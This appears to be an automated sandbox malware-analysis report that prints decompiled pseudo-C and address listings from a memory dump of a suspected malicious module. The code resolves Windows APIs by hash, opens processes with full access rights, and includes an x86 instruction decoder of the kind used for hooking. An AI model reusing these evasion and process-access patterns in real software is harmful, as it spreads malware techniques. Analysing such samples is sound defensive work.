								E7332F8C4( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E7332F558( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E7332F8C4( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 4);
								 *(E7332F558( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E7332F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E73332F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7332F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E7332F8C4( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E7332F558( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E7332F558(_t439 + 0x28,  *(_t439 + 0x70));
										E7332F8C4( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 4);
										 *(E7332F558( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7332F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E7332F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E7332F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E7332F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E7332F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E7332F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E7333382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7332F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E7332F8C4( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E73332F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E7332F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E7332F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E7332F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E7332F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E7332F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E7333382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7332F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E7332F8C4( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7332F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x7332a5ae
0x7332a5b0
0x7332a5bb
0x7332a5c1
0x7332a5c5
0x7332a5ca
0x7332a5d0
0x7332a5e0
0x00000000
0x7332a5e2
0x7332a5e2
0x7332a5ed
0x7332a5ed
0x7332ab6b
0x7332ab6d
0x7332ab6e
0x7332abad
0x7332abb1
0x7332abbf
0x7332abcd
0x7332abcd
0x7332abb8
0x7332abd3
0x7332abd8
0x00000000
0x7332abd8
0x7332abbc
0x7332abbd
0x00000000
0x7332a5f7
0x7332a5f7
0x7332a5fb
0x7332a702
0x7332a702
0x7332a707
0x7332a818
0x7332a81c
0x7332a821
0x7332a825
0x7332a94f
0x7332a951
0x7332a955
0x7332a95e
0x7332a967
0x7332a96b
0x7332a974
0x7332a97b
0x7332a97c
0x7332a980
0x7332a984
0x7332a988
0x7332a98a
0x7332aaf4
0x7332aaf4
0x7332aafc
0x7332ab14
0x7332ab16
0x7332ab18
0x7332ab52
0x7332ab52
0x7332ab54
0x7332ab54
0x7332ab57
0x7332ab72
0x7332ab86
0x7332ab89
0x7332ab8e
0x7332ab99
0x7332ab9a
0x7332ab9d
0x7332ab9f
0x7332aba8
0x00000000
0x7332aba8
0x7332ab59
0x7332ab5d
0x7332ab66
0x00000000
0x7332ab66
0x7332ab29
0x7332ab39
0x7332ab3d
0x7332ab3d
0x7332ab40
0x7332ab43
0x7332ab46
0x7332ab4c
0x00000000
0x00000000
0x00000000
0x7332ab4e
0x7332a992
0x7332a992
0x7332a994
0x7332a998
0x7332a99d
0x7332a99f
0x7332a9a3
0x7332a9a6
0x7332a9ae
0x7332a9b0
0x00000000
0x00000000
0x7332a9c7
0x7332a9e2
0x7332a9e4
0x7332a9f7
0x7332a9f9
0x7332a9fb
0x7332aa16
0x7332aa16
0x7332aa1a
0x7332aa1c
0x00000000
0x00000000
0x7332aa1e
0x7332aa21
0x7332aa42
0x7332aa61
0x7332aa67
0x7332aa6a
0x7332aa6f
0x7332aa70
0x7332aa74
0x00000000
0x00000000
0x7332aa7c
0x7332aa7c
0x7332aa7e
0x7332aa8a
0x7332aa96
0x7332aaa0
0x7332aaa3
0x7332aaa6
0x7332aaaa
0x7332aab1
0x7332aab5
0x7332aab9
0x7332aaba
0x7332aabe
0x7332aac3
0x7332aac8
0x7332aacc
0x7332aad0
0x7332aad6
0x7332aadc
0x7332aae2
0x7332aae8
0x7332aaed
0x7332aaee
0x7332aaee
0x00000000
0x7332aa7e
0x00000000
0x7332aa21
0x7332a9ff
0x7332aa10
0x7332aa12
0x7332aa14
0x00000000
0x00000000
0x00000000
0x7332aa14
0x7332aa27
0x00000000
0x7332aa27
0x7332a82b
0x7332a82e
0x7332a830
0x00000000
0x00000000
0x7332a838
0x7332a838
0x7332a83a
0x7332a83a
0x7332a84b
0x7332a84d
0x7332a850
0x00000000
0x00000000
0x7332a946
0x7332a947
0x7332a949
0x00000000
0x00000000
0x00000000
0x7332a949
0x7332a856
0x7332a859
0x7332a863
0x7332a868
0x7332a86a
0x7332a870
0x7332a877
0x7332a87b
0x7332a880
0x7332a884
0x7332acbf
0x7332acd3
0x7332acf6
0x7332acfb
0x7332acfb
0x7332a89b
0x7332a8a0
0x7332a8a0
0x7332a8a0
0x7332a8a0
0x7332a8a6
0x7332a8ab
0x7332a8ad
0x7332a8b2
0x7332a8b9
0x7332a8be
0x7332a8c0
0x7332ac7d
0x7332ac8e
0x7332aca8
0x7332acad
0x7332acad
0x7332a8d6
0x7332a8db
0x7332a8db
0x7332a8db
0x7332a8db
0x7332a8ef
0x7332a90d
0x7332a912
0x7332a922
0x7332a93f
0x7332a941
0x7332a941
0x00000000
0x7332a859
0x7332a70f
0x7332a70f
0x7332a711
0x7332a718
0x7332a726
0x7332a728
0x7332a72b
0x7332a732
0x7332a734
0x7332a765
0x7332a774
0x7332a776
0x7332a778
0x7332a796
0x7332a798
0x7332a79a
0x7332a7ad
0x7332a7cc
0x7332a7d2
0x7332a7d5
0x7332a7ec
0x7332a808
0x7332a80a
0x7332a80a
0x7332a80a
0x7332a80a
0x7332a79a
0x00000000
0x7332a778
0x7332a738
0x7332a738
0x7332a73a
0x7332a74b
0x7332a74d
0x7332a74f
0x00000000
0x00000000
0x7332a75b
0x7332a75c
0x7332a763
0x00000000
0x00000000
0x00000000
0x7332a763
0x7332a751
0x7332a754
0x00000000
0x00000000
0x7332a80d
0x7332a80d
0x7332a80e
0x7332a80e
0x00000000
0x7332a601
0x7332a603
0x7332a603
0x7332a605
0x7332a60c
0x7332a61a
0x7332a61c
0x7332a620
0x7332a624
0x7332a626
0x7332a654
0x7332a657
0x7332a65c
0x7332a660
0x7332a665
0x7332a66c
0x7332a671
0x7332a673
0x7332ac3a
0x7332ac4b
0x7332ac6b
0x7332ac70
0x7332ac70
0x7332a689
0x7332a68e
0x7332a68e
0x7332a68e
0x7332a68e
0x7332a6a0
0x7332a6a2
0x7332a6a4
0x7332a6b5
0x7332a6b5
0x7332a6bb
0x7332a6c0
0x7332a6c4
0x7332a6ca
0x7332a6d1
0x7332a6d6
0x7332a6d8
0x7332abee
0x7332abff
0x7332ac20
0x7332ac25
0x7332ac25
0x7332a6ef
0x7332a6f4
0x7332a6f4
0x7332a6f4
0x7332a6f4
0x7332a6f7
0x7332a6f7
0x00000000
0x7332a6f7
0x7332a62a
0x7332a62a
0x7332a62c
0x7332a63d
0x7332a63f
0x7332a641
0x00000000
0x00000000
0x7332a64d
0x7332a64e
0x7332a652
0x00000000
0x00000000
0x00000000
0x7332a652
0x7332a643
0x7332a646
0x00000000
0x00000000
0x7332a6f8
0x7332a6f8
0x7332a6f9
0x7332a6f9
0x00000000
0x7332a605
0x7332a5fb

Strings

, xrefs: 7332ABB3

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e66b2b3c8d82455a2f7ff984351a6dbb322a21b633c1417e20b9eb5cbdbad662
Instruction ID: 5592ae2a496d7e8ac2c814c5fdb318cf40350a283daeccdebce3c2bfa58fbb48
Opcode Fuzzy Hash: e66b2b3c8d82455a2f7ff984351a6dbb322a21b633c1417e20b9eb5cbdbad662
Instruction Fuzzy Hash: 061260719093459FD725DF24C980B6EBBF5EF85612F108A1DE8AA972A0DF30DD06CB42

Uniqueness

Uniqueness Score: -1.00%

Function 733392DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E733392DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E733335D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x733392e3
0x733392e7
0x733392f3
0x733392f7
0x733392fb
0x73339300
0x73339303
0x73339305
0x73339307
0x73339307
0x7333930a
0x73339310
0x73339388
0x7333938c
0x7333938f
0x7333938f
0x73339392
0x00000000
0x73339392
0x73339317
0x7333937f
0x73339383
0x00000000
0x73339383
0x7333931e
0x73339377
0x7333937a
0x00000000
0x7333937a
0x73339323
0x73339361
0x73339368
0x7333936b
0x73339334
0x73339334
0x7333933a
0x00000000
0x00000000
0x7333933f
0x73339359
0x7333935c
0x00000000
0x7333935c
0x73339344
0x00000000
0x73339346
0x7333934a
0x7333934d
0x00000000
0x7333934d
0x73339344
0x73339395
0x73339395
0x73339395
0x7333939e
0x733393a7
0x733393aa
0x733393ad
0x733393b0
0x733393b3
0x733393b9
0x733393fb
0x733393fe
0x733393ff
0x73339406
0x73339409
0x733393bb
0x733393bf
0x733393c9
0x733393d0
0x733393d2
0x733393eb
0x733393ee
0x733393ee
0x733393d0
0x73339411
0x73339414
0x73339417
0x7333941b
0x7333941f
0x73339429
0x7333942d
0x73339437
0x73339440
0x7333944d
0x73339450
0x73339453
0x73339453
0x7333945f
0x7333946a
0x73339470
0x73339474
0x73339461
0x73339461
0x73339461
0x7333947c
0x733394a6
0x733394ac
0x733394ac
0x733394b4
0x7333985d
0x73339863
0x73339869
0x73339869
0x00000000
0x733394ba
0x733394ba
0x733394be
0x733394c1
0x733394c4
0x733394c7
0x733394cb
0x733394cd
0x733394d0
0x733394d3
0x733394d7
0x733394dc
0x733394df
0x733394e3
0x733394e8
0x733394eb
0x733394ed
0x733394f0
0x733394f4
0x733394f9
0x73339509
0x7333950f
0x7333950f
0x73339517
0x73339519
0x73339522
0x73339524
0x73339527
0x73339532
0x7333955f
0x73339534
0x7333954b
0x7333954b
0x73339567
0x7333956d
0x73339573
0x73339573
0x73339567
0x73339522
0x7333957a
0x733395eb
0x733395f0
0x73339649
0x7333970b
0x73339710
0x7333971f
0x73339725
0x73339729
0x73339732
0x73339739
0x73339742
0x73339750
0x73339753
0x7333973b
0x7333973b
0x7333973b
0x73339739
0x7333975c
0x73339789
0x7333979c
0x733397a4
0x7333978b
0x7333978d
0x73339795
0x73339795
0x7333975e
0x73339763
0x73339782
0x73339765
0x7333976a
0x7333977b
0x7333976c
0x7333976c
0x7333976c
0x7333976a
0x73339763
0x733397ac
0x733397bb
0x733397c8
0x733397d1
0x733397d5
0x733397d9
0x733397dc
0x733397df
0x733397e2
0x733397e5
0x733397e8
0x733397ee
0x733397f2
0x733397f8
0x733397f8
0x733397ee
0x733397fe
0x7333983b
0x7333983f
0x73339846
0x7333984c
0x73339800
0x73339803
0x73339823
0x73339827
0x7333982e
0x73339835
0x73339805
0x73339808
0x7333980a
0x7333980e
0x73339818
0x7333981e
0x7333981e
0x73339808
0x73339803
0x73339853
0x73339853
0x7333986c
0x7333986c
0x73339872
0x73339877
0x733398d1
0x733398d6
0x73339915
0x7333991a
0x7333991c
0x73339920
0x73339923
0x73339926
0x73339928
0x73339929
0x73339929
0x7333992e
0x7333994c
0x7333994e
0x73339952
0x73339958
0x7333995b
0x7333995d
0x7333995e
0x7333995e
0x00000000
0x73339930
0x73339930
0x73339930
0x73339934
0x7333993a
0x7333993d
0x7333993f
0x73339942
0x73339961
0x73339961
0x73339968
0x73339982
0x7333996a
0x7333996a
0x73339976
0x73339977
0x7333997a
0x7333997a
0x73339990
0x73339990
0x7333992e
0x733398db
0x733398e9
0x73339901
0x73339905
0x73339908
